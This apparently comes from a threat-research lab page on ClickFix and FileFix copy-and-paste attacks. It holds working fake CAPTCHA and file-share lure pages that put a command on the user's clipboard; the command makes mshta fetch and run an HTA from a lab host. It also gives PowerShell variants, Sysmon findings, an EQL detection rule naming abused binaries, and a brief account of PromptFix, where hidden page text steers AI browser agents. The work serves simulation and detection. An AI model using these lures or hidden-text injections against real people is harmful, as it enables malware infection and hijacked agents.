The "AnyFix" Technique: A Deep Dive into Malicious Copy-and-Paste Attacks

This is a deep dive into the family of social engineering techniques we're calling "AnyFix," which includes variants like ClickFix, FileFix, and PromptFix. These attacks have seen rapid adoption by threat actors due to their effectiveness in bypassing traditional security controls by tricking users into executing malicious code. This technique is categorized under MITRE ATT&CK as T1204.004 - User Execution: Malicious Copy and Paste.

Threat Intelligence

The "AnyFix" family of social engineering techniques has shown a dramatic increase in adoption by a wide range of threat actors since 2023, from initial access brokers to nation-state groups. These methods exploit user trust in familiar interfaces to achieve code execution, often bypassing traditional defenses because the malicious activity is initiated by the user themselves.

Campaigns delivering malware such as LummaStealer, DarkGate, NetSupport RAT, and various ransomware families have successfully utilized these techniques. Threat actors like the Russian state-backed group Star Blizzard (also known as ColdRiver) and the Interlock ransomware gang have been observed employing ClickFix variants in their operations. The attack often begins with a phishing email, malvertising, or SEO poisoning that directs the user to a malicious webpage.

Attack Variants

There are multiple variants known in the "AnyFix" family. More variants are likely to emerge in the future.

ClickFix

The original technique, ClickFix, typically involves a webpage displaying a fake CAPTCHA or an error message. The user is instructed to copy a piece of text and paste it into the Windows Run dialog (Win+R) or a terminal to "fix" the issue. This command is often a PowerShell one-liner that downloads and executes the next stage of the attack.

FileFix

A stealthier evolution, FileFix, instructs the user to paste the malicious command into the Windows File Explorer address bar instead of the Run dialog. This can feel more benign to the user, as they may believe they are simply navigating to a file path. This method can also bypass Mark-of-the-Web (MOTW) warnings that would typically appear for downloaded files.

PromptFix

A newer and more sophisticated variant, PromptFix, targets users of AI-powered browsers and agents. Attackers embed malicious instructions in invisible text on a webpage. While the human user sees a normal page, the AI agent processes the hidden text as a command, potentially leading to actions like drive-by downloads or interacting with phishing sites without the user's knowledge.

References

Attack Simulation

We simulate parts of the attack to generate logs for further analysis. There are various options available:

Atomic Red Team

The Atomic Red Team project develops small and highly portable detection tests. It includes a dedicated test for ClickFix, in which PowerShell writes a payload as a value under the RunMRU registry key. This simulation reproduces only the registry artifact that is characteristic of the ClickFix technique; it does not replicate the user interaction.

Atomic Red Team test for ClickFix

Atomic Red Team: T1204.002 Test #12 - ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell

Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches mshta.exe with a remote payload:

``` powershell
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
```

Simulated ClickFix & FileFix Page

For a more realistic simulation, a static webpage can be crafted and hosted within a lab environment for live interaction from a victim machine. We will host HTML pages using Python on a Kali host and browse to them from a Windows host.

Webpages

We use simple HTML with JavaScript to copy the payload to the user's clipboard when a button is clicked, simulating the core mechanism of these attacks.

HTML code for simulated ClickFix page

Embedded code from the 'projects' folder in the GitHub repository. Contains example payload.

``` html
<!DOCTYPE html>
<html>
<head>
  <title>Verify you are human</title>
  <style>
    /* Base page styling */
    body {
      background-color: #f2f2f2;
      font-family: 'Segoe UI', sans-serif;
      margin: 0;
      padding: 40px 0;
      display: flex;
      justify-content: center;
      align-items: flex-start;
      min-height: 100vh;
    }

    /* Main centered container */
    .container {
      background-color: #ffffff;
      width: 560px;
      border-radius: 6px;
      box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
      border: 1px solid #dcdcdc;
      text-align: center;
    }

    /* Header section with title and timestamp */
    .header {
      padding: 40px 30px 10px;
    }

    .header h2 {
      font-size: 20px;
      color: #2f2f2f;
      margin: 0;
    }

    .timestamp {
      font-size: 13px;
      color: #7a7a7a;
      margin-top: 6px;
    }

    /* Instructions block */
    .instructions {
      text-align: left;
      padding: 25px 40px 10px;
      font-size: 15px;
      color: #333333;
      line-height: 1.6;
    }

    .instructions ol {
      margin: 0;
      padding-left: 20px;
    }

    /* Fake captcha button */
    .captcha-btn {
      display: inline-block;
      background-color: #ffffff;
      border: 2px solid #ccc;
      border-radius: 4px;
      padding: 10px 16px;
      font-size: 14px;
      cursor: pointer;
      margin-bottom: 15px;
      user-select: none;
    }

    /* Captcha checked state */
    .captcha-btn.checked {
      border-color: #107c10;
      color: #107c10;
      font-weight: bold;
    }

    /* Footer section with branding */
    .footer {
      font-size: 11.5px;
      color: #6b6b6b;
      background-color: #f7f7f7;
      padding: 12px 24px;
      border-top: 1px solid #dcdcdc;
      display: flex;
      justify-content: space-between;
      align-items: center;
    }

    .footer img {
      height: 16px;
    }
  </style>
</head>
<body>

  <div class="container">
    <!-- Header text -->
    <div class="header">
      <h2>Verify you are human</h2>
      <div class="timestamp">06/20/2025 10:22:45 AM</div>
    </div>

    <!-- Fake captcha button -->
    <button id="captcha" class="captcha-btn">Start verification</button>

    <!-- Instructions with steps -->
    <div class="instructions">
      <p>Please verify that you are a human to continue.</p>

      <ol id="steps">
        <li style="margin-bottom: 10px;">Press <strong>Windows Key + R</strong></li>
        <li style="margin-bottom: 10px;">Press <strong>CTRL + V</strong> and press <strong>Enter</strong></li>
      </ol>

    </div>

    <!-- Footer branding -->
    <div class="footer">
      <img src="https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg" alt="Microsoft">
    </div>
  </div>

  <!-- Hidden payload storage -->
  <textarea id="hiddenPayload" style="position:absolute; left:-9999px;"></textarea>

  <script>
    const captcha = document.getElementById('captcha');
    const steps = document.getElementById('steps');
    const hidden = document.getElementById("hiddenPayload");

    // Function executed when captcha is "solved"
    function solveCaptcha() {
      const payload = "mshta.exe http://192.168.1.100/open_calc.hta # ✅ I am not a robot - Verification ID: 123456 - Press OK";
      hidden.value = payload;
      hidden.select();
      hidden.setSelectionRange(0, hidden.value.length);
      const copied = document.execCommand("copy");
      if (copied) {
        // Update button appearance to verified state
        captcha.classList.add("checked");
        captcha.innerText = "Finish next steps";
      } else {
        alert("Clipboard copy not supported");
      }
    }

    // Attach click event to captcha button
    captcha.addEventListener("click", solveCaptcha);
  </script>
</body>
</html>
```

Hosting malicious webpage on Kali

Python command to host the malicious HTML files on Kali for the victim client to connect to.

``` bash
$ ls
clickfix.html   filefix.html    open_calc.hta

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

Figure clickfix_lure: Simulated ClickFix-style page.

HTML code for simulated FileFix page

Embedded code from the 'projects' folder in the GitHub repository. Contains example payload.

``` html
<!DOCTYPE html>
<html>
<head>
  <title>A file was shared with you</title>
  <style>
    /* Page layout and base font styling */
    body {
      background-color: #f2f2f2;
      font-family: 'Segoe UI', sans-serif;
      margin: 0;
      padding: 40px 0;
      display: flex;
      justify-content: center;
      align-items: flex-start;
      min-height: 100vh;
    }

    /* Main centered container */
    .container {
      background-color: #ffffff;
      width: 560px;
      border-radius: 6px;
      box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
      border: 1px solid #dcdcdc;
      text-align: center;
    }

    /* Header section containing file info */
    .header {
      padding: 40px 30px 10px;
    }

    .header h2 {
      font-size: 20px;
      color: #2f2f2f;
      margin: 0;
    }

    /* Timestamp under the header */
    .timestamp {
      font-size: 13px;
      color: #7a7a7a;
      margin-top: 6px;
    }

    /* Instructions block for user steps */
    .instructions {
      text-align: left;
      padding: 25px 40px 10px;
      font-size: 15px;
      color: #333333;
      line-height: 1.6;
    }

    .instructions ol {
      margin: 0;
      padding-left: 20px;
    }

    /* Styled button to simulate verification */
    #fileExplorer {
      background-color: #0078d4;
      color: white;
      border: none;
      padding: 12px 30px;
      font-size: 15px;
      border-radius: 4px;
      margin: 30px 0 40px;
      cursor: pointer;
    }

    #fileExplorer:hover {
      background-color: #005ea2;
    }

    /* Footer section mimicking official styling */
    .footer {
      font-size: 11.5px;
      color: #6b6b6b;
      background-color: #f7f7f7;
      padding: 12px 24px;
      border-top: 1px solid #dcdcdc;
      display: flex;
      justify-content: space-between;
      align-items: center;
    }

    .footer img {
      height: 16px;
    }
  </style>
</head>
<body>

  <div class="container">
    <!-- File announcement -->
    <div class="header">
      <h2>The file "HRPolicy.docx" was made available to you</h2>
      <div class="timestamp">06/20/2025 10:22:45 AM</div>
    </div>

    <!-- Step-by-step usage instructions -->
    <div class="instructions">
      <p>To access <strong>HRPolicy.docx</strong>, validate below and follow the steps:</p>
      <ol id="steps">
        <li style="margin-bottom: 10px;">Open File Explorer (<strong>Windows Key + E</strong>) and select the address bar (<strong>CTRL + L</strong>)</li>
        <li style="margin-bottom: 10px;">Paste the file path and press <strong>Enter</strong></li>
      </ol>
    </div>

    <!-- Hidden input to simulate file selection -->
    <input type="file" id="fileInput" webkitdirectory directory style="display:none;">
    <!-- Fake verification button -->
    <button id="fileExplorer">Verify that you are not a robot</button>

    <!-- Footer branding -->
    <div class="footer">
      <img src="https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg" alt="Microsoft">
    </div>
  </div>

  <!-- Hidden textarea for payload injection -->
  <textarea id="hiddenPayload" style="position:absolute; left:-9999px;"></textarea>

  <script>
    const fileInput = document.getElementById('fileInput');
    const steps = document.getElementById('steps');
    const hidden = document.getElementById("hiddenPayload");
    const fileExplorer = document.getElementById('fileExplorer');

    // On button click, copy payload path to clipboard, then open hidden file input
    fileExplorer.addEventListener('click', () => {
      const payload = "mshta.exe http://192.168.1.100/open_calc.hta  # C:\\company\\internal-secure\\filedrive\\HRPolicy.docx";
      hidden.value = payload;
      hidden.select();
      hidden.setSelectionRange(0, hidden.value.length);
      const copied = document.execCommand("copy");

      // File inputs cannot directly launch File Explorer
      // Hidden file input is clicked to simulate open dialog
      fileInput.click();
    });

    // When file input changes, reset and re-trigger after short delay
    fileInput.addEventListener('change', () => {
      alert("Please follow the stated instructions.");
      fileInput.value = "";
      setTimeout(() => fileInput.click(), 500);
    });
  </script>
</body>
</html>
```

Figure filefix_lure: Simulated FileFix-style page.

Payloads

There is a large variety of payloads that can be used for these techniques, as can be seen in the reports linked on top of this page. One of the first payloads seen in the wild leveraged .HTA files through Mshta; we use those to simulate the attack. The main difference between the "AnyFix" variations is the disguising text appended to the end of the payload (a fake verification string for ClickFix, a fake file path for FileFix).

Figure clickfix_payload: Simulated ClickFix Payload in Windows Run Dialog.

Mshta payload

Simulates a user pasting a potentially malicious Mshta command into the Windows run dialog, following a typical ClickFix structure to deceive users. This payload will open the Windows calculator application.

```
mshta.exe http://192.168.1.100/open_calc.hta # ✅ I am not a robot - Verification ID: 123456 - Press OK
```

Code for simulated .HTA payload file

Embedded code from the 'projects' folder in the GitHub repository. Contains payload to open Windows Calculator.

``` html
<html>
  <head>
    <hta:application
      id="OpenCalc"
      applicationname="OpenCalc"
      border="thin"
      caption="yes"
      showintaskbar="yes"
      maximizebutton="no"
      minimizebutton="no"
      sysmenu="yes"
      windowstate="normal" />
    <title>Open Calc</title>
    <script language="VBScript">
      ' Runs when the HTA window loads: start calc.exe, then close the window
      Sub Window_OnLoad()
        Dim sh
        Set sh = CreateObject("WScript.Shell")
        sh.Run "calc.exe", 1, False
        window.Close
      End Sub
    </script>
  </head>
  <body>
  </body>
</html>
```

[Extra] Powershell payload

Simulates a user pasting a potentially malicious Powershell command into the Windows run dialog, following a typical ClickFix structure to deceive users.

``` powershell
powershell Invoke-RestMethod -Uri "https://www.cloudflare.com" -Method GET  # ✅ I am not a robot - Verification ID: 123456 - Press OK
```

Figure filefix_payload: Simulated FileFix Payload in Windows Explorer.

Mshta payload

Simulates a user pasting a potentially malicious Mshta command into the File Explorer address bar, following a typical FileFix structure to deceive users. This payload will open the Windows calculator application.

```
mshta.exe http://192.168.1.100/open_calc.hta  # C:\company\internal-secure\filedrive\HRPolicy.docx
```

Code for simulated .HTA payload file

The payload file is the same open_calc.hta shown in the ClickFix section above; only the disguising text appended to the command differs.

[Extra] Powershell payload

Simulates a user pasting a potentially malicious Powershell command into the Windows Explorer, following a typical FileFix structure to deceive users.

``` powershell
powershell Invoke-RestMethod -Uri "https://www.cloudflare.com" -Method GET  # C:\company\internal-secure\filedrive\HRPolicy.docx
```

Logs

Host

Both simulations generated over 250 logs, primarily from Sysmon due to our detailed tracing configuration. The logs from both simulations are very similar, as expected from their parallel attack paths. The key difference lies in the specific registry keys that are modified.

Figure clickfix_logs_summary: Summary of logs generated by ClickFix simulation. Results are similar for FileFix.

Elastic Defend only captured events related to the calculator process starting. It did not capture any RunMRU registry changes. This may be due to default policy configurations that do not monitor this specific registry key for changes. This highlights a potential visibility gap in some EDR solutions.

Figure clickfix_logs_endpoint: Limited logs generated by Elastic Agent.

Sysmon, with an appropriate configuration (see architecture), provided full visibility into the attack chain. It logged the network connection to the malicious HTML page, the subsequent process events, and the modification of the registry. The RunMRU key will contain the payload when a command is executed from the Windows Run dialog.

Figure clickfix_logs_endpoint: Logs generated by Sysmon (filtered for relevance).

Similar to the ClickFix simulation, Elastic Defend only captured the calculator process events, while Sysmon covered the full attack chain. For FileFix, the interesting registry artifact is the modification of the TypedPaths key, which is updated when a path is entered into the address bar of a File Explorer window that was opened through the browser (not one opened via CTRL+E).

Figure filefix_logs_sysmon_registry: Logs generated by Sysmon specific to registry changes during the FileFix attack chain.

Detection & Hunting

None of the default Elastic rules were triggered during the simulated attack sequence. This underscores the evasive nature of user-initiated execution.

Elastic has published an Elastic Defend detection rule for similar behavior. Below is an adapted version of the EQL query that can be used for creating a detection rule or for threat hunting in Kibana. The original query has been modified to include our findings and remove fields that may not be populated in all environments.

Also see the custom detection rule published in the repository.

[CUSTOM] [EQL] Execution of Suspicious Commands in Combination with AnyFix Registry Entry

``` eql
sequence by host.id with maxspan=1m
  [
/* (1)! */ process where (event.action == "start" or event.action == "Process creation") and
/* (2)! */ process.name : ("cmd.exe", "powershell.exe", "curl.exe", "msiexec.exe", "mshta.exe", "wscript.exe", "cscript.exe") and
/* (3)! */ process.parent.name : ("explorer.exe", "msedge.exe") and
/* (4)! */ process.args_count >= 2 ]
/* (5)! */  [ registry where event.action == "RegistryEvent (Value Set)" and
    registry.path : ("*RunMRU*", "*TypedPaths*") and
    registry.data.strings : ("*cmd*", "*powershell*", "*curl*", "*mshta*") ]
```

  1. Event action filter: include process creation events as reported by Elastic Defend ("start") and Sysmon ("Process creation") respectively.
  2. Process name filter: include high-risk or commonly abused executables used in AnyFix attacks.
  3. Parent process filter: restrict to processes launched by Explorer (user-initiated) or a browser (add more browser executables when needed).
  4. Argument count filter: only include processes with two or more arguments, which filters out bare program launches.
  5. Registry modification: a RunMRU (ClickFix) or TypedPaths (FileFix) value containing a command-like string is set on the same host within the one-minute window after the process start.
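To exercise the detection logic offline, here is the EQL sequence above reimplemented in Python as an added example (not code from the page or its repository). It assumes ECS-style flat field names (with registry.data.strings as a plain string) and approximates EQL sequence matching by pairing each qualifying process start with the next matching RunMRU/TypedPaths write on the same host within one minute; the events, host IDs and SID are constructed.

```python
"""Replay of the page's AnyFix EQL sequence over constructed Sysmon-style events. Added
example, not page/repo code; ECS-style field names and all sample values are assumptions."""
from datetime import datetime, timedelta

MAXSPAN = timedelta(minutes=1)  # "with maxspan=1m" in the EQL rule
SUSPICIOUS_PROCS = {"cmd.exe", "powershell.exe", "curl.exe", "msiexec.exe",
                    "mshta.exe", "wscript.exe", "cscript.exe"}
LAUNCHING_PARENTS = {"explorer.exe", "msedge.exe"}
REG_KEY_MARKERS = ("RunMRU", "TypedPaths")  # ClickFix / FileFix artifacts
REG_DATA_MARKERS = ("cmd", "powershell", "curl", "mshta")

def is_suspicious_start(ev):
    """Stage 1: abused binary started from Explorer or a browser with arguments."""
    return (ev["event.action"] in ("start", "Process creation")
            and ev.get("process.name", "").lower() in SUSPICIOUS_PROCS
            and ev.get("process.parent.name", "").lower() in LAUNCHING_PARENTS
            and ev.get("process.args_count", 0) >= 2)

def is_anyfix_registry_write(ev):
    """Stage 2: RunMRU or TypedPaths value set that holds a command-like string."""
    return (ev["event.action"] == "RegistryEvent (Value Set)"
            and any(k in ev.get("registry.path", "") for k in REG_KEY_MARKERS)
            and any(m in ev.get("registry.data.strings", "").lower() for m in REG_DATA_MARKERS))

def correlate(events):
    """Pair each stage-1 event with the next stage-2 event on the same host within MAXSPAN."""
    hits, pending_by_host = [], {}
    for ev in sorted(events, key=lambda e: e["@timestamp"]):
        pending = pending_by_host.setdefault(ev["host.id"], [])
        if is_suspicious_start(ev):
            pending.append(ev)
        elif is_anyfix_registry_write(ev):
            for p in pending:  # oldest matching start wins, one match per start
                if ev["@timestamp"] - p["@timestamp"] <= MAXSPAN:
                    hits.append((ev["host.id"], p, ev))
                    pending.remove(p)
                    break
    return hits

T0 = datetime(2025, 6, 20, 10, 23, 0)
EXPLORER = r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Explorer"
def proc(ts, host, name, parent, argc):
    return {"@timestamp": ts, "host.id": host, "event.action": "Process creation",
            "process.name": name, "process.parent.name": parent, "process.args_count": argc}
def reg(ts, host, subkey, data):
    return {"@timestamp": ts, "host.id": host, "event.action": "RegistryEvent (Value Set)",
            "registry.path": EXPLORER + subkey, "registry.data.strings": data}
SAMPLE_EVENTS = [  # constructed telemetry, not captured from a real host
    # ClickFix: mshta launched from the Run dialog, RunMRU written a second later -> hit
    proc(T0, "WIN11-LAB", "mshta.exe", "explorer.exe", 2),
    reg(T0 + timedelta(seconds=1), "WIN11-LAB", r"\RunMRU\a",
        r"mshta.exe http://192.168.1.100/open_calc.hta # I am not a robot\1"),
    # Benign Run-dialog use: notepad is not an abused binary and the data has no marker
    proc(T0 + timedelta(seconds=30), "WIN11-LAB", "notepad.exe", "explorer.exe", 1),
    reg(T0 + timedelta(seconds=31), "WIN11-LAB", r"\RunMRU\b", r"notepad\1"),
    # FileFix-like pair, but the TypedPaths write lands outside maxspan -> no hit
    proc(T0, "WIN10-LAB", "powershell.exe", "msedge.exe", 5),
    reg(T0 + timedelta(minutes=2), "WIN10-LAB", r"\TypedPaths\url1",
        "powershell Invoke-RestMethod -Uri https://www.cloudflare.com"),
]
```

Running `correlate(SAMPLE_EVENTS)` yields exactly one hit, the ClickFix pair; lowering MAXSPAN or widening REG_DATA_MARKERS shows how the rule's tuning knobs trade coverage for noise.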